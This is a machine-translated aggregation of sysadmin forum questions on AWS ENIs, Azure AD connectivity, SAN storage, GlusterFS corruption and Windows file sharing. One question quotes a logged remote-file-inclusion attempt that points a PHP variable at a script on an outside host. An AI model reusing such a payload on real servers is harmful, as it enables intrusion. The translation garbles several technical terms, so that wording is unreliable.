Articles of networking

AWS EC2实例需要多个ENI吗?

AWS允许您将多个弹性networking接口(ENI)连接到EC2实例。 除了“使它看起来像一个本地服务器”,是否有任何情况下,实际上需要多个ENI? 我已经考虑过在内部环境中要做这些事情的原因,但是这些原因似乎都不适用于AWS: 链路聚合 链接冗余 独立的pipe理界面 在线IDS / IPS 在线防火墙 AWS隐含的路由器总是“坐在”每个ENI和其他所有东西之间,所以不可能再放置另一个实例(运行,比如嗅探器)。 亚马逊自己的文档甚至不清楚为什么你需要一个实例上的多个ENI。 它只是说多个接口是“有用的,当你想要:” 创build一个pipe理networking。 在您的VPC中使用networking和安全设备。 在不同的子网上创build具有工作负载/angular色的双宿主实例。 创build一个低预算,高可用性的解决scheme。 但是这并不能解释为什么ENI是必需的,甚至是用于这些用例的理想select。 (显然,在不同子网上的双宿主实例需要多个ENI,但是这并不能解释为什么你首先需要一个双宿主实例)。 我唯一可以想到的用例是一个运行容器的实例(例如Docker),并且您想要将各个容器映射到不同子网中的主机IP地址。 什么是多个ENI的使用情况,如果有的话?

通过Azure虚拟机托pipeActive Directory来连接没有vpn的客户端

我们(一个小型​​组织)正在部署Azure VM作为Active Directory域控制器。 现在我们要将客户端添加到这个活动目录并查看networking/连接解决方​​案。 有许多网站的用户,也有外部的网站。 已经看过直接访问,但它需要客户端上的Windows企业许可证。 已经看过Azure网站到现场的VPN,但是用户需要在大多数情况下并非如此。 已经看到用户站点VPN的天青点,但它只在用户login后才连接(即使使用任务调度器,我已经打破了azure色VPN客户端,但它没有连接之前login到Windows,因为它使用证书和Windows不允许login之前访问它)。 有没有解决scheme,通过互联网validation用户到活动目录像直接访问?

命令显示HP MSA 2040 SAN上的存储使用情况?

有什么方法可以告诉我在HP MSA2040 SAN存储上的使用情况吗? 我正在寻找这个,但没有运气。 我只需要通过cli或脚本运行命令知道整个SAN存储的使用情况,我没有看到任何cli命令给我提供的信息。 每次我必须login到Web控制台才能findSAN的状态。 有脚本或命令可以做到这一点?

确定GlusterFS数据损坏的原因

将数据写入已在两台服务器上configuration的复制GlusterFS卷时,我遇到了数据损坏。 我设置的configuration如下: 服务器运行Ubuntu 16.04和GlusterFS v3.10.6 客户端运行Ubuntu 14.04和GlusterFS v3.10.6 GlusterFS中已经configuration了两个卷,每个都在每个服务器上分配两块砖。 每个砖块都是带有EXT4 / LUKS文件系统的MDADM RAID5arrays。 每个卷都configuration了默认选项,再加上滴滴涕检测。 这些如下: features.scrub: Active features.bitrot: on features.inode-quota: on features.quota: on nfs.disable: on 当大型目录从其中一个客户端机器上的本地文件系统复制到configuration的GlusterFS卷中的任一个时,数据损坏就会显示出来。 当为复制的文件和源文件计算md5校验和,并比较两者时,校验和的数目会有所不同。 手动触发GlusterFS卷上的自愈function,显示没有识别出用于修复的文件。 此外,查看gluster volume bitrot <volname> scrub status的输出以及/var/log/glusterfs/bitd.log和/var/log/glusterfs/scrub.log的输出日志,似乎没有发现任何错误。 这些问题只是performance出来,最近大约一周之后,大约10个客户使用了这两个卷。 我已经尝试了卷离线,并已经testing直接通过底层的本地文件系统写入数据到每个砖,并没有能够重现的问题。 为了进一步debugging这个问题,我在VirtualBox的虚拟机上configuration了一个类似的设置,并且没有能够重现这个问题。 对于这些错误的原因,我相当不知所措。 任何意见,我可以采取进一步的debugging步骤或已知问题与GlusterFS和我的configuration,将不胜感激。

LeftHand SAN如何在生产环境中执行?

我以前问过这个ServerFault的问题: 有没有人有左手VSA SAN的经验 一般认为,即使在轻负载下,生产SQL服务器的性能也不够好。 所以,新的问题是,LeftHand的SAN如何在惠普或戴尔专用硬件盒上执行? 我们正在考虑在2路复制中使用2个HP节点的Starter SAN,2台ESX服务器总共托pipe2台Active Directory服务器,1台MS SQL服务器,1台文件服务器和1台通用服务器,所有的Microsoft Server 2005或2008)。 我看LeftHand的原因是完整的软件包。 我打算build立一个灾难恢复站点,比如SAN如何在异地执行asynchronous复制,而无需返回供应商获取更多许可证。 我也喜欢Network Raid架构中的冗余。 我看过其他的SANS,发现了不同的错误。 例如,戴尔的EqualLogic:发现虽然单个硬件盒非常冗余,但是跨越多个盒子的数据并不是多余的,如果某个节点出现故障,您将失去硬件上唯一的数据副本(一件事是肯定的,所有的硬件都会失败…什么时候是唯一的问题)。 我也使用了XioTech SAN。值得花钱,但是我认为这对于我所针对的办公室来说太过分了。 在XioTech中获得硬件冗余的成本使得我工作的预算有点不可及。 谢谢, 基思

在Windows Server 2003中禁用networking的“禁用”选项

如果右键单击Windows Server 2003系统托盘中的networking图标,则“状态”旁边的“禁用”将会显示。 如果“误判”这一点,结果可能是灾难性的。 有没有一种方法来禁用它,或从列表中删除它,以避免“意外”点击它?

networking或Active Directory所需资源不可用

使用Microsoft系统中心我不断有以下错误。 Alert: Network or Active Directory Required Resources Not Available Source: DC-SMS01.hq.gratisinc.com Path: Last modified by: System Last modified time: 5/13/2009 12:10:24 PM Alert description: Windows cannot obtain the domain controller name for your computer network. (An unexpected network error occurred. ). Group Policy processing aborted. 我们有各地的域控制器,他们很高兴和同步。 FSMOangular色分散开来,networking链接都很快而且不饱和。 任何人有这个问题? 如果是的话,你是怎么解决的?

Mac OS X机器 – 非常慢地访问Windows共享

我有一些MAC盒子通过站点到站点VPN从远程Windows Server 2003盒子访问共享。 他们使用cifs连接到共享,使用AD凭据进行身份validation,性能是绝对可悲的 – 请等待5分钟以上来打开/复制/移动共享文档,即使是小于100Kb的文档。 我对这种情况相对比较陌生,但在我接pipe之前已经有相当长的一段时间了。 对于一些进一步的背景,我可以像Mac那样从同一局域网上的Windows机器上以相同的速度访问相同的文件。 所有这些机器位于Cisco PIX防火墙(提供站点到站点VPN访问)后面的Cisco Catalyst交换机上。 从Mac盒子和Windows盒子到文件服务器的Ping响应大致相同:6-7ms。 有没有人遇到像这样从Mac访问Windows共享的问题? 这是一个协议问题? 感谢您的任何意见。

可以通过networking服务器URL更改registry项吗?

所以我最近浏览了我的网站访问日志,并注意到有几个尝试做这样的事情 ?page=pics//?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr//skin_shop/…/cms/idf.txt?? 当然,我并不是完全愚蠢的,这对我的服务器或者软件没有任何影响,但是我认为它是这样的,我会看到那个域名上的实际情况。 当它加载时,Chrome试图根据Comodo更改registry项。 有没有什么办法可以从浏览器运行的代码中真正改变一个registry键值,或者是我第一次看到Chrome试图更改一个registry键值。 编辑:4次尝试修改HKLM / SYSTEM / ControlSet001 / Services / ESENT中的不同键

Web服务器能否指向另一台机器上的Subversion版本库?

我们在防火墙后面有一个Subversion版本库,我试图弄清楚如何为远程开发者提供访问权限(而不必让他们访问整个机器或VPN)。 有没有一种方法,我们可以让我们的Web服务器指向Subversion存储库,并redirect所有的颠覆行动? 这样开发人员只需要访问我们的Web服务器,而不是安装了Subversion版本库的安全文件服务器。